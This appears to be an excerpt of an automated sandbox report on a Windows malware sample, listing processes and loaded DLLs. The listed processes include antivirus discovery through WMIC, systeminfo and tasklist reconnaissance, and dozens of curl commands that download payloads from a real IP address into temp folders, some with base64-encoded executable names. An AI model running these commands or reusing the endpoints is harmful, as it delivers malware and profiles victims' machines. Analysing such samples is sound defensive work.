Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayNameJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: srvcli.dll
